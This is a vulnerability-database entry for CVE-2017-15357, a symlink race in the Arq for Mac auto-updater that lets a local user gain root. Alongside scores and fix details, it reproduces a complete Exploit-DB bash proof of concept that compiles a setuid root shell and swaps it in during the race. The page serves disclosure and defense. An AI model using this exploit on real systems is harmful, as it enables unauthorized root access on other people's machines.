CVE-2017-15357

high

Published 2017-12-01 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

7.4

CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.4

Description

The setpermissions function in the auto-updater in Arq before 5.9.7 for Mac allows local users to gain root privileges via a symlink attack on the updater binary itself.

Predictions

Exploit likelihood

72%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-43218 local macos verified text · 2 KB

Mark Wadham · 2017-12-06

Arq 5.9.6 - Local Privilege Escalation

text exploit Source: Exploit-DB

# Arq Backup from Haystack Software is a great application for backing up macs and
# windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
# vulnerable to a local root privilege escalation exploit.

# The updater binary has a "setpermissions" function which sets the suid bit and
# root ownership on itself but it suffers from a race condition that allows you to
# swap the destination for these privileges using a symlink.

# We can exploit this to get +s and root ownership on any arbitrary binary.

# Other binaries in the application also suffer from the same issue.

# This was fixed in Arq 5.9.7.

# https://m4.rkw.io/arq_5.9.6.sh.txt
# 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
# ------------------------------------------------------------------------------
#!/bin/bash

##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html                 ####
##################################################################

vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`

cwd="`pwd`"

if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi

cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl(
    "/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
    NULL
  );
  return 0;
}
EOF

gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c

ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater

./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater

i=0
timeout=10

while :
do
  r=`ls -la ./arq_updater |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
  i=$((i+1))
  if [ $i -eq $timeout ] ; then
    rm -f ./arq_updater
    echo "Not vulnerable"
    exit 1
  fi
done

./arq_updater

Application impact

Vendor	Product	Versions	Fixed
arqbackup	arq	`{"endExcluding":"5.9.7"}`	`5.9.7`

References

CWEs

CWE-59 CWE-362

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.